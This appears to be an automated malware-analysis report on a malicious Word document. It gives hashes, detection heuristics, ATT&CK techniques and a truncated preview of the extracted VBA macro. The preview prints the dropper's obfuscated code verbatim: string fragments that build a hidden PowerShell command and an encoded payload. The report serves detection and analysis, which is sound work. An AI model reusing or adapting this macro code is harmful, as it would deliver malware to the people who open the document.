Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c24dce174bbe7ad4…

MALICIOUS

Office (OLE)

234.8 KB Created: 2018-06-27 21:40:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 043ead79bed8f5e91b4495103edc4e0f SHA-1: adaf9c605c277fec23ebdf1aa3536ad03cb407b7 SHA-256: c24dce174bbe7ad49447a1e0c9c16babe2f040f15c9f5a8c874f1779062b0aef
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a common technique for executing arbitrary commands. This suggests the document is a dropper designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6593498-0' further supports this assessment.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6593549-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6593549-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9537 bytes
SHA-256: d82558de4c44c63084aed7e493c2490cb63b55f40382aacdee771a38a593d05f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DwbtGBq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HaUishjS"
Function zhAhX()
On Error Resume Next
ZQwzIP = CDate(64687)
YKsUX = Sin(54011)
VpTXz = 20365
uaNJB = 29006
wvXdA = 59451
ENuvT = bXRKtD
jjUbImL = "Hell  ." + " " + Chr(40) + Chr(40) + "Gv" + " '*" + "mDr*'" + Chr(41) + ".NaMe" + "[3,11," + "2]-J" + "OiN" + "''" + Chr(41)
DXYzAc = Sin(60015)
qWbmV = 19273
NblavP = XzIcDM
oUTZlL = 46231
KszWh = 1826
lBkJVZ = CDate(2849)
fGGjo = " " + Chr(40) + " -joIN" + Chr(40) + " " + "'42<121T" + "84j12" + "7p" + "51N9" + "6{10" + "7r121j35" + "g97j" + "108{" + "100!1"
GlVFZZ = Sin(18534)
cDjtzk = 50736
zpOQCj = DOOvTa
ndbPd = 95434
LoqJs = 22015
LcIzzW = CDate(91976)
oauHsoCl = "07" + "{10" + "9p122b46" + "!64b107" + "{122T32" + "g89" + "b10"
ASPOps = Sin(4440)
AKTRY = 32913
NXwiZa = raKHcZ
GbQKar = 42971
kcjPNk = 65110
fMliRZ = CDate(74648)
HlAozFoAuoB = "7p1" + "08r77" + "{98p103p" + "10" + "7N96T12" + "2r53b42<" + "103<88<1" + "01{51g"
MsHWIK = Sin(92379)
rsNkVw = 63775
TFrdu = OMpMP
SAsaF = 84329
FmiXKp = 35525
wPHNR = CDate(99906)
XMArALYKwu = "41b102" + "j122!12" + "2<1" + "26j52<" + "33p33<12" + "1!121" + "r121p32<" + "124{10" + "3b" + "120N10" + "7r124b11"
Lvwrw = Sin(40857)
zEtRhw = 8149
cYECj = TSEwR
WCzuVF = 31108
GqTWFq = 24232
zEHPni = CDate(94214)
rfYXWEvO = "1g124!9" + "7g108b98" + "j107r" + "125g32N1" + "09!" + "97j99g3"
WFrvL = Sin(57650)
JAZCc = 50514
NZAdQl = hzqJw
RzAwR = 17327
NZhQIJ = 77146
XqSEss = CDate(43495)
HaAJTmn = "3T55N55b" + "71T99<3" + "3b78T1" + "02N122p1" + "22T" + "126!5" + "2T33j33j" + "121"
ncSvl = Sin(94056)
swOmc = 54472
zWrNU = sjVHzD
Ydfqs = 32429
ijXhDq = 28983
VEwJt = CDate(60286)
UbBuPvV = "g121{" + "12" + "1g32N99" + "g12" + "3<99r10" + "8!11" + "1p103N99" + "T97p10" + "6{107" + "p98b107" + "j125j"
mOiwh = Sin(47162)
wsoCRO = 71142
OsOQor = wJKiY
zzvpL = 35190
KoTizb = 74243
EfzFtW = CDate(89707)
iZiwU = "109j97!" + "124N122" + "!32p1" + "09" + "<97" + "r99p3" + "3g54T98T" + "67!" + "56j56p1" + "03p3" + "3N7" + "8p102!1"
zhAhX = jjUbImL + fGGjo + oauHsoCl + HlAozFoAuoB + XMArALYKwu + rfYXWEvO + HaAJTmn + UbBuPvV + iZiwU
BQiQt = Sin(83157)
zbBXIj = 44467
zhwED = hqPbZX
fUvKEJ = 86315
IrGPz = 77155
PlTjJz = CDate(12615)
End Function
Function RfjPcHh()
On Error Resume Next
IUIil = Sin(81545)
IdESMQ = 7737
wZVCpp = pEGUow
SzXsfs = 87748
ZZOSZJ = 85143
prZvi = CDate(54824)
OrKHTq = "22{12" + "2N126b" + "52p3" + "3p33b121" + "!12" + "1b1" + "21T32T" + "119!" + "123N" + "119"
AVwTvo = Sin(60518)
zjUHSG = 30018
NjciUA = nXQjww
dRrYo = 87432
mVZzXw = 93054
RqbBUJ = CDate(28837)
XdGIZ = "{123" + "T107" + "g116!" + "108" + "j32!" + "109" + "T97g"
KDjzL = Sin(90908)
DLAZpc = 58788
YmtHJV = zrwPKz
fEdlXR = 42213
FcGrT = 35837
uYlwN = CDate(54287)
jhwDozVH = "99r33p12" + "0N" + "102j9" + "6r100T6" + "8p10" + "0N33N" + "78<102r1" + "22j1"
iiCHQ = Sin(33409)
jjtfL = 73876
kzbtI = hQASB
XuEjC = 2435
uRcntO = 4507
aFHFC = CDate(72146)
NtSKpjHGiz = "22!126{" + "52b33" + "N33b" + "121r" + "121" + "N1"
YGjwTn = 9760
zLGcE = Sin(37690)
JvLzS = CDate(92266)
dXTuDv = 55484
iwLlsf = 12259
OszVGB = JhfGE
aRwoZaq = "21{32j12" + "2<12" + "5{1" + "02<" + "123b10" + "1!123" + "!99!3"
qhfns = 96597
mPrsfM = Sin(82700)
qFOdX = CDate(91617)
awjcu = 48967
iTzcuO = 77493
IKQWp = mOYmNC
ACiIat = "2<123r9" + "6N121" + "r103{10" + "1g12" + "3p" + "32!11" + "1j10"
WflRF = 38712
tYlGZ = Sin(81082)
JMuFY = CDate(47453)
YmPHr = 11998
uUXcr = 36160
EhflGS = kizsGb
YYJJETQ = "9b" + "32{10" + "3j106g33" + "g88" + "j55b12" + "7{72N96" + "T70N123!" + "33N" + "78{102" + "{1" + "22"
cWSuD = 99503
BAlHi = Sin(53511)
GFmCiI = CDate(36234)
XQkQU = 24547
KMlhkw = 70436
RsiAnn = BtUBwT
zZUwcd = "p12" + "2T12" + "6p52T" + "33j33" + "N121<1" + "21g" + "12" + "1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.